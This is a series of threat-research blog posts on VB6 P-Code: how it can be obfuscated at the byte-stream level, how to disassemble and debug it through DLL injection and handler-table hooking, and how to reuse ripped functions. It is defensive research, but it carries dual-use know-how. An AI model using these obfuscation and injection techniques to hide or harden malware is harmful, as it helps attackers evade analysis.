Normal view

There are new articles available, click to refresh the page.
Before yesterdayAvast Threat Labs

VB6 P-Code Obfuscation

28 April 2021 at 09:37

Code obfuscation is one of the cornerstones of malware. The harder code is to analyze the longer attackers can fly below the radar and hide the full capabilities of their creations.

Code obfuscation techniques are very old and take many many forms from source code modifications, opcode manipulations, packer layers, virtual machines and more.

Obfuscations are common amongst native code, script languages, .NET IL, and Java byte code

As a defender, it’s important to be able to recognize these types of tricks, and have tools that are capable of dealing with them. Understanding the capabilities of the medium is paramount to determine what is junk, what is code, and what may simply be a tool error in data display. 

On the attackers side, in order to develop a code obfuscation there are certain prerequisites required. The attacker needs tooling and documentation that allows them to craft and debug the complex code flow. 

For binary implementations such as native code or IL, this would involve specs of the target file format, documentation on the opcode instruction set, disassemblers, assemblers, and a capable debugger.

One of the code formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available to work with it. 

In the course of exploring this instruction set certain questions arose:

  • Can VB6 P-Code be obsfuscated at the byte stream layer? 
  • Has this occurred in samples in the wild?
  • What would this look like?
  • Do we have tooling capable of handling it?


Before we continue, we will briefly discuss the VB6 P-Code format and the tools available for working with it.

VB6 P-Code is a proprietary, variable length, binary instruction set that is interpreted by the VB6 Virtual Machine (msvbvm60.dll).

In terms of documentation, Microsoft has never published details of the VB6 file format or opcode instruction set. The opcode handler names were gathered by reversers from the debug symbols leaked with only a handful of runtimes. 

At one time there was a reversing community,, which was dedicated to the VB6 file format and P-Code instruction set. Mirrors of this message board are still available today [1]. 

On the topic of tooling the main disassemblers are p32Disasm, VB-Decompiler, Semi-Vbdecompiler and the WKTVBDE P-Code debugger.

Of these only Semi-Vbdecompiler shows you the full argument byte stream, the rest display only the opcode byte. While several private P-Code debuggers exist, WKTVBDE is the only public tool with debugging capabilities at the P-Code level. 

In terms of opcode meanings. This is still widely undocumented at this point. Beyond intuition from their names you would really have to compile your own programs from source, disassemble them, disassemble the opcode handlers and debug both the native runtime and P-Code to get a firm grasp of whats going on. 

As you can glimpse, there is a great deal of information required to make sense of P-Code disassembly and it is still a pretty dark art for most reversers. 

Do VB6 obfuscators exist?

While doing research for this series of blog posts we started with an initial sample set of 25,000 P-Code binaries which we analyzed using various metrics. 

Common tricks VB6 malware uses to obfuscate their intent include:

  • junk code insertion at source level
  • inclusion of large bodies of open source code to bulk up binary
  • randomized internal object and method names 
    • mostly commonly done at pre-compilation stage
    • some tools work post compilation.
  • all manner of encoded strings and data hiding
  • native code blobs launched with various tricks such as CallWindowProc

To date, we have not yet documented P-Code level manipulations in the wild. 

Due to the complexity of the vector, P-Code obsfuscations could have easily gone undetected to date which made it an interesting area to research. Hunting for samples will continue.

Can VB P-Code even be obfuscated and what would that look like?

In the course of research, this was a natural question to arise.  We also wanted to make sure we had tooling which could handle it. 

Consider the following VB6 source:

The default P-Code compilation is as follows:

 An obsfuscated sample may look like the following:

From the above we see multiple opcode obfuscation tricks commonly seen in native code.

It has been verified that this code runs fine and does not cause any problems with the runtime. This mutated file has been made available on Virustotal in order for vendors to test the capabilities of their tooling [2]. 

To single out some of the tricks:

Jump over junk:

 Jumping into argument bytes:

At runtime what executes is:

Do nothing sequences:

 Invalid sequences which may trigger fatal errors in disassembly tools:


The easiest markers of P-Code obfuscation are:

  •     jumps into the middle of other instructions
  •     unmatched for/next opcodes counts
  •     invalid/undefined opcodes 
  •     unnatural opcode sequences not produced by the compiler
  •     errors in argument resolution from randomized data 

Some junk sequences such as Not Not can show up normally depending on how a routine was coded.

This level of detection will require a competent, error-free, disassembly engine that is aware of the full structures within the VB6 file format. 


Code obfuscation is a fact of life for malware analysts. The more common and well documented the file format, the more likely that obfuscation tools are wide spread in the wild.

This reasoning is likely why complex formats such as .NET and Java had many public obfuscators early on.

This research proves that VB6 P-Code obfuscation is equally possible and gives us the opportunity to make sure our tools are capable of handling it before being required in a time constrained incident response. 

The techniques explored here also grant us the insight to hunt for advanced threats which may have been already using this technique and had flown under the radar for years.

We encourage researchers to examine the mutated sample [2] and make sure that their frameworks can handle it without error.


[1] mirror

[2] Mutated P-Code sample SHA256 and VirusTotal link

The post VB6 P-Code Obfuscation appeared first on Avast Threat Labs.

VB6 P-Code Disassembly

5 May 2021 at 05:48

In this article we are going to discuss the inner depths of VB6 P-Code disassembly and the VB6 runtime.

As a malware analyst, VB6 in general, and P-Code in particular, has always been a problem area. It is not well documented and the publicly available tooling did not give me the clarity I really desired.

In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [1]. Microsoft has been kind enough to provide debug symbols with this version for the .ENGINE P-Code handlers.

To really delve into this topic we are going to have to cover several areas.

The general layout will cover:

  • how the runtime executes a P-Code stream
  • how P-Code handlers are written
  • primer on the P-Code instruction set
  • instruction groupings
  • internal runtime conventions
  • how to debug handlers

Native Opcode Handlers & Code Flow

Let’s start with how a runtime handler interprets the P-Code stream.

While in future articles we will detail how the transition is made from native code to P-Code. For our purposes here, we will look at individual opcode handlers once the P-Code interpretation has already begun.

For our first example, consider the following P-Code disassembly:

Here we can see two byte codes at virtual address 0x401932. These have been decoded to the instruction LitI2_Byte 255. 0xF4 is the opcode byte. 0xFF is the hardcoded argument passed in the byte stream. 

The opcode handler for this instruction is the following:

While in a handler, the ESI register will always start as the virtual address of the next byte to interpret. In the case above, it would be 0x401933 since the 0xF4 byte has already been processed to get us into this handler.

The first instruction at 0x66105CAB will load a single byte from the P-Code byte stream into the EAX register. This value is then pushed onto the stack. This is the functional operation of this opcode.

EAX is then cleared and the next value from the byte stream is loaded into the lower part of EAX (AL). This will be the opcode byte that takes us to the next native handler.

The byte stream pointer is then incremented by two. This will set ESI past the one byte argument, and past the next opcode which has already been consumed.

Finally, the jmp instruction will transfer execution to the next handler by using the opcode as an array index into a function pointer table.

Now that last sentence is a bit of a mouth full, so lets include an example. Below is the first few entries from the _tblByteDisp table. This table is an array of 4 byte function pointers.

Each opcode is an index into this table. The *4 in the jump statement is because each function pointer is 4 bytes (32 bit code).

The only way we know the names of each of these P-Code instructions is because Microsoft included the handler names in the debug symbols for a precious few versions of the runtime. 

The snippet above also reveals several characteristics of the opcode layout to be aware of. First note, there are invalid slots such as opcode 0x01-InvalidExCode. The reason for this is unknown, but it also means we can have some fun with the runtime such as introducing our own opcodes [5]

The second thing to notice is that multiple opcodes can point to the same handlers such as the case with lblEX_Bos. Here we see that opcode 0 leads to the same place as opcode 2. There are actually 5 opcode sequences which point to the BoS (Beginning of Statement) handler.

The next thing to notice is that the opcode names are abbreviated and will require some deciphering to learn how to read them. 

Finally from the LitI2_Byte handler we already analyzed, we can recognize that all of the stubs were hand written in assembler. 

From here, the next question is how many handlers are there? If each opcode is a single byte, there can only be a maximum of 256 handlers right? That would make sense, but is incorrect.

If we look at the last 5 entries in the _tblByteDisp table we find this:

The handler for each of these looks similar to the following:

Here we see EAX zeroed out, the next opcode byte loaded into AL and the byte code pointer (ESI) incremented. Finally it uses that new opcode to jump into an entirely different function pointer table.

This would give us a maximum opcode count of (6*256)-5 or 1531 opcodes.

Now luckily, not all of these opcodes are defined. Remember some slots are invalid, and some are duplicate entries. If we go through and eliminate the noise, we are left with around 822 unique handlers. Still nothing to sneeze at.

So what the above tells us is that not all instructions can be represented as a single opcode. Many instructions will be prefixed with a lead byte that then makes the actual opcode reference a different function pointer table.

Here is a clip from the second tblDispatch pointer table:

To reach lblEX_ImpUI1 we would need to encode 0xFB as the lead byte and 0x01 as the opcode byte.

This would first send execution into the _lblBEX_Lead0 handler, which then loads the 0x01 opcode and uses tblDispatch table to execute lblEX_ImpUI1.

A little bit confusing, but once you see it in action it becomes quite clear. You can watch it run live for yourself by loading a P-Code executable into a native debugger and setting a breakpoint on the lead* handlers.

Byte stream argument length  

Before we can disassemble a byte stream, we also need to know how many byte code arguments each and every instruction takes. With 822 instructions this can be a big job! Luckily other reversers have already done much of the work for us. The first place I saw this table published was from Mr Silver and Mr Snow in the WKTVBDE help file.

A codified version of this can be found in the Semi-VbDecompiler source [2] which I have used as a reference implementation. The opcode sizes are largely correct in this table, however some errors are still present. As with any reversing task, refinement is a process of trial and error. 

Some instructions, 18 known to date, have variable length byte stream arguments. The actual size of the byte stream to consume before the next opcode is embedded as the two bytes after the opcode. An example of this is the FFreeVar instruction.

In this example we see the first two bytes decode as 0x0008 (little endian format), which here represents 4 stack variables to free.

Opcode Naming Conventions

Before we continue on to opcode arguments, I will give a brief word on naming conventions and opcode groupings.

In the opcode names you will often see a combination of the following abbreviations. The below is my current interpretation of the less intuitive specifiers:

Opcode abbreviation Description
Imp Import
Ad Address
St / Ld Store / Load
I2 Integer/Boolean
I4 Long
UI1 Byte
Lit Literal(ie “Hi”,2,8 )
Cy Currency
R4 Single
R8 Double
Str String
Fn Calls a VBA export function
FPR Floating point register
PR Uses ebp-4C as a general register
Var Variant
Rf Reference
VCall VTable call
LateID Late bound COM object call by method ID
LateNamed Late bound COM Object call by method name

Specifiers are often combined to denote meaning and opcodes often come in groups such as the following:

An opcode search interface such as this is very handy while learning the VB6 instruction set.

Opcode Groups

The following shows an example grouping:

Opcode abbreviation Description
ForUI1 Start For loop with byte as counter type
ForI2 With integer counter, default step = 1
ForI4 Long type as counter
ForStepUI1 For loop with byte counter, user specified step
ForEachCollVar For each loop over collection using variant
ForEachAryVar For each loop over array using variant
ForEachCollObj For each loop over collection using object type

A two part series on the intricacies of how For loops were implemented is available [3] for the curious.

As you can see, the opcode set can collapse down fairly well once you take into account the various groupings. While I have grouped the instructions in the source, I do not have an exact number as the lines between them can still be a bit fuzzy. It is probably around 100 distinct operations once grouped.

Now onto the task of argument decodings. I am not sure why, but most P-Code tools only show you the lead byte, opcode byte, mnemonic. Resolved arguments are only displayed if it is fully handled. 

Everything except Semi-VBDecompiler [6] skips the display of the argument bytes.

The problem arises from the fact no tool decodes all of the arguments correctly for all of the opcodes yet. If you do not see the argument byte stream, there is no indication other than a subtle jump in virtual address that anything has been hidden from you. 

Consider the following displays:

The first version shows you opcode and mnemonic only. You don’t even realize anything is missing. The second version gives you a bigger hint and at least shows you no argument resolution is occurring. The third version decodes the byte stream arguments, and resolves the function call to a usable name.

Obviously the third version is the gold standard we should expect from a disassembler. The second version can be acceptable and shows something is missing. The first version leaves you clueless. If you are not already intimately familiar with the instruction set, you will never know you are missing anything.

Common opcode argument types

In the Semi-VbDecompiler source many opcodes are handled with custom printf type specifiers [4]. Common specifiers include:

Format specifier Description
%a Local argument
%l Jump location
%c Proc / global var address stored in constant pool
%e Pool index as P-Code proc to call
%x Pool index to locate external API call
%s Pool index of string address
%1/2/4 Literal byte, int, or long value
%t Code object from its base offset
%v VTable call
%} End of procedure

Many opcodes only take one or more simple arguments, %a and %s being the most common.

Consider "LitVarStr %a %s" which loads a variant with a literal BSTR string, and then pushes that address to the top of the stack:

The %a decoder will read the first two bytes from the stream and decode it as follows:

Interpreting 0xFF68 as a signed 2 byte number is -0x98. Since it is a negative value, it is a local function variable at ebp-0x98. Positive values denote function arguments. 

Next the %s handler will read the next two bytes which it interprets as a pool index. The value at pool index 0 is the constant 0x40122C. This address contains an embedded BSTR where the address points to the unicode part of the string, and the preceding 4 bytes denoting its length.

A closer look at run time data for this instruction is included in the debugging section later on.

Another common specifier is the %l handler used for jump calculations. It  can be seen in the following examples:

In the first unconditional jump the byte stream argument is 0x002C. Jump locations are all referenced from the function start address, not the current instruction address as may be expected. 

0x4014E4 + 0x2C = 0x401510 
0x4014E4 + 0x3A = 0x40151E

Since all jumps are calculated from the beginning of a function, the offsets in the byte stream must be interpreted as unsigned values. Jumps to addresses before the function start are not possible and represent a disassembly error. 

Next lets consider the %x handler as we revisit the "ImpAdCallFPR4 %x" instruction:

The native handler for this is:

Looking at the P-Code disassembly we can see the byte stream of 24001000 is actually two integer values. The first 0x0024 is a constant pool index, and the second 0x0010 is the expected stack adjustment to verify after the call. 

Now we haven’t yet talked about the constant pool or the house keeping area of the stack that VB6 reserves for state storage. For an abbreviated description, at runtime VB uses the area between ebp and ebp-94h as kind of a scratch pad. The meaning of all of these fields are not yet fully known however several of the key entries are as follows:

Stack position Description
ebp-58 Current function start address
ebp-54 Constant pool
ebp-50 Current function raw address (RTMI structure)
ebp-4C PR (Pointer Register) used for Object references

In the above disassembly we can see entry 0x24 from the constant pool would be loaded.

A constant pool viewer is a very instructive tool to help decipher these argument byte codes.

It has been found that smart decoding routines can reliably decipher constant pool data independent of analysis of the actual disassembly.

One such implementation is shown below:

If we look at entry 0x0024 we see it holds the value 0x4011CE. If we look at this  address in IDA we find the following native disassembly:

0x40110C is the IAT address of msvbvm60.rtcImmediateIf import. This opcode is how VB runtime imports are called. 

While beyond the scope of this paper, it is of interest to note that VB6 embeds a series of small native stubs in P-Code executables to splice together the native and P-Code executions. This is done for API calls, call backs, inter-modular calls etc. 

The Constant Pool

The constant pool itself is worth a bit of discussion. Each compilation unit such as a module, class, form etc gets its own constant pool which is shared for all of the functions in that file. 

Pool entries are built up on demand as the file is processed by the compiler from top to bottom. 

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets
  • blank slots which represent internal COM objects filled out at startup by the runtime (ex: App.)

More advanced opcode processors

More complex argument resolutions require a series of opcode post processors.  In the disassembly engine I am working on there are currently 13 post processors which handle around 30 more involved opcodes.

Things start to get much more complex when we deal with COM object calls. Here we have to resolve the COM class ID, interface ID, and discern its complete VTable layout to determine which method is going to be called. This requires access to the COM objects type library if its an external type, and the ability to recreate its function prototype from that information.

For internal types such as user classes, forms and user controls, we also need to understand their VTable layout. For internal types however we do not receive the aid of tlb files. Public methods will have their names embedded in the VB file format structures which can be of help.

Resolution of these types of calls is beyond the scope of what we can cover in an introductory paper, but it is absolutely critical to get right if you are writing a disassembler that people are going to rely upon for business needs.

More on opcode handler inputs

Back to opcode arguments. It is also important to understand that opcodes can take dynamic runtime stack arguments in addition to the hard coded byte stream arguments. This is not something that a disassembler necessarily needs to understand though. This level of knowledge is mainly required to write P-Code assembly or a P-Code decompiler. 

Some special cases however do require the context of the previous disassembly in order to resolve properly. Consider the following multistep operation:

Here the LateIdLdVar resolver needs to know which object is being accessed. Scanning back and locating the VCallAd instruction is required to find the active object stored in PR

Debugging handlers

When trying to figure out complex opcode handlers, it is often helpful to watch the code run live in a debugger. There are numerous techniques available here. Watching the handler itself run requires a native debugger. 

Typically you will figure out how to generate the opcode with some VB6 source which you compile. You then put the executable in the same directory as your reference copy of the vb runtime and start debugging. 

Some handlers are best viewed in a native debugger, however many can be figured out just by watching it run through a P-Code debugger. 

A P-Code debugger simplifies operations showing you its execution at a higher level. In one step of the debugger you can watch multiple stack arguments disappear, and the stack diff light up with changes to other portions. Higher level tools also allow you to view complex data types on the stack as well as examine TLS memory and keep annotated offsets. 

In some scenarios you may actually find yourself running both a P-Code debugger and a native debugger on the target process at the same time. 

One important thing to keep in mind is that VB6 makes heavy use of COM types. 

Going back to our LitVarStr example:

You would see the following after it executes:

0019FC28 ebp-120 0x0019FCB0 ; ebp-98 - top of stack 
0019FCB0 ebp-98 0x00000008 
0019FCB4 ebp-94 0x00000000  
0019FCB8 ebp-90 0x0040122C

A data viewer would reveal the following when decoding ebp-98 as a variant:

Variant 19FCB0 
VT: 0x8( Bstr ) 
Res1: 0 
Res2: 0 
Res3: 0 
Data: 40122C 
String len: 9 -> never hit

Debugging VB6 apps is a whole other ball of wax. I mention it here only in passing to give you a brief introduction to what may be required when deciphering what opcodes are doing. In particular recognizing Variants and SafeArrays in stack data will serve you well when working with VB6 reversing.


In this paper we have laid the necessary ground work in order to understand the basics of a VB6 P-Code disassembly engine. The Semi-VbDecompiler source is a good starting point to understand its inner workings. 

We have briefly discussed how to find and read native opcode handlers along with some of the conventions necessary for understanding them. We introduced you to how opcodes flow from one to the next, along with how to determine the number of byte stream arguments each one takes, and how to figure out what they represent. 

There is still much work to be done in terms of documenting the instruction set. I have started a project where I catalog:

  • VB6 source code required to generate an opcode
  • byte stream arguments size and meaning
  • stack arguments consumed
  • function outputs

Unfortunately it is still vastly incomplete. This level of documentation is foundational and quite necessary for writing any P-Code analysis tools.

Still to be discussed, is how to find the actual P-Code function blobs within the VB6 compiled executable. This is actually a very involved task that requires understanding a series of complex and nested file structures. Again the Semi-VbDecompiler source can guide you through this maze.

While VB6 is an old technology, it is still commonly used for malware. This research is aimed at reducing gaps in understanding around it and is also quite interesting from a language design standpoint. 

[1] – VB6 runtime with symbols
[2] – Semi-VbDecompiler opcode table Source
[3] – A closer look at the VB6 For Loop implementation
[4] – Semi-VBDecompiler opcode argument decodings 
[5] – Introducing a one byte NOP opcode
[6] – Semi-VBDecompiler

The post VB6 P-Code Disassembly appeared first on Avast Threat Labs.

Writing a VB6 P-Code Debugger

12 May 2021 at 12:46


In this article we are going to discuss how to write a debugger for VB6 P-code. This has been something I have always wanted to do ever since I first saw the WKTVBDE P-Code Debugger written by Mr Silver and Mr Snow back in the early 2000’s

There was something kind of magical about that debugger when I first saw it. It was early in my career, I loved programming in VB6, and reversing it was a mysterious dark art.

While on sabbatical I finally I found the time to sit down and study the topic in depth. I am now sharing what I discovered along the way.

This article will build heavily on the previous paper titled VB P-Code Disassembly[1]. In this paper we detailed how the run time processes P-Code and transfers execution between the different handlers.

It is this execution flow that we will target to gain control with our debugger.

An example of the debugger architecture detailed in this paper can be found in the free vbdec pcode disassembler and debugger


When I started researching this topic I wanted to first examine what a process running within the WKTVBDE P-Code debugger looked like.

A test P-Code executable was placed alongside a copy of the VB runtime with debug symbols[2]. The executable was launched under WKTVBDE and then a native debugger was attached.

Examining the P-Code function pointer tables at 0x66106D14 revealed all the pointers had been patched to a single function inside the WKTVBDE.dll

This gives us our first hint at how they implemented their debugger. It is also worth noting at this point that the WKTVBDE debugger runs entirely within the process being debugged, GUI and all!

To start the debugger, you run loader.exe and specify your target executable. It will then start the process and inject the WKTVBDE.dll within it. Once loaded WKTVBDE.dll will hook the entire base P-Code handler table with its own function giving it first access to whatever P-Code is about to execute.

The debugger also contains:

  • a P-Code disassembler
  • ability to parse all of the nested VB internal structures
  • ability to list all code objects and control events (like on timer or button click)

This is in addition to the normal debugger UI actions such as data dumping, breakpoint management, stack display etc.

This is A LOT of complex code to run as an injection dll. Debugging all of this would have been quite a lot of work for sure.

With a basic idea of how the debugger operated, I began searching the web to find any other information I could. I was happy to find an old article by Mr Silver on Woodmann that I have mirrored for posterity [3].

In this article Mr Silver lays out the history of their efforts in writing a P-Code debugger and gives a template of the hook function they used. This was a very interesting read and gave me a good place to start.

Design Considerations:

Looking forward there were some design considerations I wanted to change in this architecture.

The first change would be that I would want to move all of the structure parsing, disassembler engine, and user interface code into its own stand alone process. These are complicated tasks and would be very hard to debug as a DLL injection.

To accomplish this task we need an easy to use, stable inter-process communication (IPC) technique that is inherently synchronous. My favorite technique in this category is using Windows Messages which automatically cause the external process to wait until the window procedure has completed before it returns.

I have used this technique extensively to stall malware after it unpacks itself [4]. I have even wired it up to a Javascript engine that interfaces with a remote instance of IDA [5].

This design will give us the opportunity to freely write and debug the file format parsing, disassembly engine, and user interface code completely independent of the debugger core.

At this point debugger integration essentially becomes an add on capability of the disassembler. The injection dll now only has to intercept execution and communicate with the main interface.

For the remainder of this paper we will assume that a fully operational disassembler has already been created and only focus on the debugger specific details.

For discussions on how to implement a disassembler and a reference implementation on structure parsing please refer to the previous paper [1].


With sufficient information now in hand it was time to start experimenting with gaining control over the execution flow.

Our first task is figuring out how to hook the P-Code function pointer table. Before we can hook it, we actually need to be able to find it first! This can be accomplished in several ways. From the WKTVBDE authors paper it sounds like they progressed in three main stages. First they started with a manually patched copy of the VB run time and the modified dll referenced in the import table.

Second they then progressed to a single supported copy of the run time with hard coded offsets to patch. A loader now injecting the debugger dll into the target process. Finally they added the ability to dynamically locate and patch the table regardless of run time version.

This is a good experimental progression which they detail in depth. The second stage is readily accessible to anyone who can understand this paper and will work sufficiently well. I will leave the details of injection and hooking as an exercise to the reader.

The basic steps are:

  • set the memory writable
  • copy the original function pointer table
  • replace original handlers with your own hook procedures

The published sample also made use of self modifying code, which we will seek to avoid. To get around this we will introduce individual hook stubs, 1 per table, to record some additional data.

Before we get into the individual hook stubs, we notice they stored some run time/state information in a global structure. We will expand on this with the following:

From the hooking code you will notice that all of the base opcodes in the first table (excluding lead byte handlers) all received the same hook. The Lead_X bytes at the end each received their own procedure.

Below shows samples of the hook handlers for the first two tables. The other 4 follow the same pattern:

The hooks for each individual table configure the global VM structure fields for current lead byte and table base. The real meat of the implementation now starts in the universal hook procedure.

In the main PCodeHookProc you will notice that we call out to another function defined as: void NotifyUI().

It is in this function where we do things like check for breakpoints, handle single stepping etc. This function then uses the synchronous IPC to talk to the out of process debugger user interface.

The debugger UI will receive the step notification and then go into a wait loop until the user gives a step/go/stop command. This has the effect of freezing the debugee until the SendMessage handler returns. You can find a sample implementation of this in the SysAnalyzer ApiLogger source [6].

The reason we call out to another function from PCodeHookProc is because it is written as a naked function in assembler. Once free from this we can now easily implement more complex logic in C.

Further steps:

Once all of the hooks are implemented you still need a way to exercise control over the debuggee. When the code is being remotely frozen, the remote GUI is actually still free to send the frozen process new commands over a separate IPC back channel.

In this manner you can manage breakpoints, change step modes, and implement lookup services through runtime exports such as rtcTypeName.

The hook dll can also patch in custom opcodes. The code below adds our own one byte NOP instruction at unused slot 0x01

As hinted at in the comments, features such as live patching of the current opcode, and “Set New Origin Here” type features are both possible. These are implemented by the debugger doing direct WriteProcessMemory calls to the global VM struct. The address of this structure was disclosed in initialization messages at startup.


Writing a P-Code debugger is a very interesting concept. It is something that I personally wanted to do for the better part of 20 years.

Once you see all the moving parts up close it is not quite as daunting as it may seem at first glance.

Having a working P-Code debugger is also a foundational step to learning how the P-Code instruction set really works. Being able to watch VB6 P-code run live with integrated stack diffing and data viewer tools is very instructive. Single stepping at this level of granularity gives you a much clearer, higher level overview of what is going on.

While the hook code itself is technically challenging, there are substantial tasks required up front just to get you into the game.

Prerequisites for this include:

  • accurate parsing of an undocumented file format
  • a solid disassembly engine for an undocumented P-Code instruction set
  • user interface that allows for easy data display and debugger control

For a reverse engineer, a project such as this is like candy. There are so many aspects to analyze and work on. So many undocumented things to explore. A puzzle with a thousand pieces.

What capabilities can be squeezed out of it? How much more is there to discover?

For me it is a pretty fascinating journey that also brings me closer to the language that I love. Hopefully these articles will inspire others and enable them to explore as well.

[1] – VB P-Code Disassembly
[2] – VB6 runtime with symbols (MD5: EEBEB73979D0AD3C74B248EBF1B6E770)
[3] – VB P-code Information by Mr Silver
[4] – ApiLogger – Breaking into Malware
[5] – IDA JScript
[6] – SysAnalyzer ApiLogger – freeze remote process

The post Writing a VB6 P-Code Debugger appeared first on Avast Threat Labs.

Binary Reuse of VB6 P-Code Functions

19 May 2021 at 10:12

Reusing binary code from malware is one of my favorite topics. Binary re-engineering and being able to bend compiled code to your will is really just an amazing skill. There is also something poetic about taking malware decryption routines and making them serve you.

Over the years this topic has come up again and again. Previous articles have included emit based rips [1], exe to dll conversion [2], emulator based approaches [3], and even converting malware into an IPC based decoder service [4].

The above are all native code manipulations which makes them something you can work with directly. Easy to disassemble, easy to debug, easy to patch. (Easy being a relative term of course :))

Lately I have been working on VB6 P-Code, and developing a P-Code debugger. One goal I had was to find a way to call a P-Code function, ripped from a malware, with my own arguments. It is very powerful to be able to harness existing code without having to recreate it (including all of its nuances.)

Is this even possible with P-Code? As it turns out, it is possible, and I am going to show you how.

The distilled knowledge below is small slice of what was unraveled during an 8 month research project into the VB6 runtime and P-code instruction set.

This paper includes 11 code samples which showcase a wide variety of scenarios utilizing this technique [5].

Note on offsets
In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [6]. Microsoft was kind enough to publish debug symbols for this build including those for the P-Code engine handlers.

Barriers to entry
The VB6 runtime was designed to load executables, dlls, and ocx controls in an undocumented format. This format contains many complex interlinked structures that layout embedded forms, class structures, dependencies etc. During startup the runtime itself also requires certain initialization steps to occur as it prepares itself for use.

If we wish to execute P-Code buffers out of the context of a VB6 host executable there are several hurdles we must overcome:

VB Runtime Initialization 

Standard runtime initialization for executables takes place through the ThunRTMain export. This is the primary entry point for loading a VB6 executable. This function takes 1 argument that is the address of the top level VB Header structure. This structure contains the full complex hierarchy of everything else within. 

While we can utilize this path for our needs, there are easier ways to go about it. Starting from ThunRTMain can also create some problems on process termination so we will avoid it. 

In 2003 when exploring VB6’s ability to generate standard dlls I found a second path to runtime initialization through the CreateIExprSrvObj export.

This export is simple to call and automatically performs the majority of runtime initialization. Some TLS structure fields however are left out. In testing, most things operate fine. The only errors discovered occur when trying to use native VB file commands, MsgBox or the built in App object.

With a little extra leg work it has been found that the TLS structures can be manually completed to regain access to most of this native functionality. 

Finally if the P-Code buffer creates COM objects, a manual call to CoInitilize must also be performed. 

Replicating basic object structures

Once CreateIExprSrvObj has been executed, we can call into P-Code streams as many times as we want from our loader code. Structure initialization is minimal and only requires the following fields: 

If the P-Code routines utilize global variables then the codeObj.aModulePublic field will also have to be set to a writable block of memory. This has been demonstrated in the globalVar and complex_globals examples. We can even pre-initialize these variables here if we desire. 

In addition to filling out these primary structures, we also have to recreate the constant pool as expected by the specific P-Code. Finally we must also update a structure field in the P-Code to point to our current object Info structure. 

While this may sound complex, there is a generator utility which automatically does all of the work for you in the majority of cases. A more detailed explanation of the following code will be presented in later sections. 

Finding an entrypoint to transition into P-Code execution 

Execution of the VB6 P-Code occurs by calling the ProcCallEngine export of the VB runtime. The stub below is the same mechanism used internally by VB compiled applications to transfer execution between sub functions.

The offset_sub_main argument moved into EDX is the address of the target P-Code functions trailing structure that defines attributes of the function. We will discuss this structure in the following sections. 

The asm stub above shows the default scenario of calling a P-Code function with no arguments. A video showing this running in a debugger is available [7]

In the decrypt_test example we explore how to call a ripped function with a complex prototype and a Variant return value. This example demonstrates reusing an extracted P-Code decoder from a malware executable. Here we can call the extracted P-Code function passing it our own data:

Understanding P-Code function layout 

P-Code functions in compiled executables are linked by a structure that trails the actual byte code. This structure is called RTMI in the VB runtime symbols and the reversing community has taken to it as ProcDscInfo. A partial excerpt of this structure is shown below: 

When we rip a P-Code function from a compiled binary, we must also extract the configured RTMI structure. ProcCallEngine requires this information in order to run a P-Code routine successfully. 

When we relocate the P-Code block outside of the target binary, we must also update the link to our new object Info table.

This is what is being set in the generated code: 

Here the rc4 buffer contains the entire ripped function, starting with the P-Code and then followed by the RTMI structure which starts at offset 0x3e4. We then patch in the address of our manually filled out object Info into the RTMI.pObjTable field. Once this is complete, the P-Code is ready for execution.

Code Generation 

When developing a method such as this, we must start with known quantities. For our purposes we are writing our own test code which is done normally in the VB6 Integrated Development Environment. This code is then extracted using a utility which generates the C or VB6 source necessary to execute it independently.

The generator tool we are using in this paper is the free VBDec [8] P-Code debugger. 

While exploring this technique, the sample code has been optimized to follow several conventions for clarity. For this research all code samples were ripped from functions in a single module. This design was chosen so that all sub function access occurs through the ImpAdCall* opcodes which draw directly against function pointers in the const pool. 

Code taken from instanced form or class compilation units would require support to replicate VTable layouts for the *Vcall opcodes. While this can be done I will leave that as future work for now.

Samples are available that make extensive use of callbacks to integrate tightly with the host code. This is useful for integrating debug output through the C host in a simple manner. 

Callbacks are accessed through the standard VB API Declare syntax which is a core part of the language and is well documented. Below are examples of sending both numeric and string debug info from the P-Code to the host. 

Giving VB direct access to the host functions, is as simple as setting their address in the corresponding constant pool slot. 

Ripping functions with VBDec is simple. Simply right click on the function in the left hand treeview and choose the Rip menu option. VBDec will generate all of the embedding data for you. Multiple functions can be ripped at once by right clicking on the top level module name. 

A corresponding const pool will also be auto-generated along with stubs to update the object Info pointers and asm stubs to call interlinked sub functions.

Once extraction/generation is complete it is left up to the developer to integrate the data into one of the sample frameworks provided.

A spectrum of samples are provided ranging from very simple, to quite complex. Samples include:

Sample Description
firstTest simple addition test
globalVar global variables test
structs passing structs from C to P-Ccode
two_funcs interlink two P-Code functions
ConstPool test decoding a binary const pool entry
lateBinding late bind sapi voice example
earlyBinding early bind sapi voice example
decrypt_test P-Code decryptor w/ complex prototype
Variant Data C host returns variant types from callback to P-Code.
benchmark RC4 benchmarking apps in C/P-Code code and straight C

Understanding the Const Pool 

Each compilation unit such as a module, class, form etc gets its own constant pool which is shared for all of the functions in that file. Pool entries are built up on demand as the file is processed by the compiler from top to bottom.

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets (not applicable to our work here) 
  • internal runtime COM objects filled out at startup (not supported) 

VBDec is capable of automatically deciphering these entries and figuring out what they represent. Once the correct type has been determined, it can generate the C or VB source necessary to fill out the const pool in the host code. The constant pool viewer form allows you to manually view these entries.

In testing it has been performing extremely well outputting complete const pools which require little to no modification. 

For callback integration with the host, if you use “dummy” as the dll name, it will automatically be assumed as a host callback. Otherwise it will be translated literally as a LoadLibrary/GetProcAddress call.

Some const pool entries may show up as Unknown. When you click on a specific entry the raw data at that offset will be loaded into the lower textbox. If this data shows all 00 00 00 00’s then this is a reference to an internal VB runtime COM object that would normally be set to a live instance at initialization.

This has been seen when using the App Object. Normally this would be set @6601802F inside _TipRegAppObject function of the runtime on initialization. These types of entries are not currently supported using this technique (and would not make sense in our context anyways.) 

Interlinked sub functions are supported. A corresponding native stub will be generated along with an entry in the const pool for it. 

Early binding and late binding to COM objects is also supported. Late binding is done entirely through strings in the const pool. For early binding you will seen a COMDEF structure and CLSID / IID data automatically generated.

